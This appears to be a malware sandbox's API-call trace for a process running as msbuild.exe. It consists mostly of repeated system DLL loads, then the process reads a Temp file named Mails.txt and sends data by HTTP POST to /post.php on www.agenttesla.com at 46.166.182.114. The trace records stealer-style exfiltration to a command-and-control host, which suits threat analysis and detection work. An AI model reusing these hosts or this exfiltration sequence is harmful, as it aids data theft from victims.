Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Unmap - True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_type True 2
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, size = 4096, size_out = 475 True 1
Fn
Data
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, size = 4096, size_out = 0 True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 2
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_type True 2
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, size = 4096, size_out = 475 True 1
Fn
Data
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, size = 4096, size_out = 0 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 263, size_out = 263 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
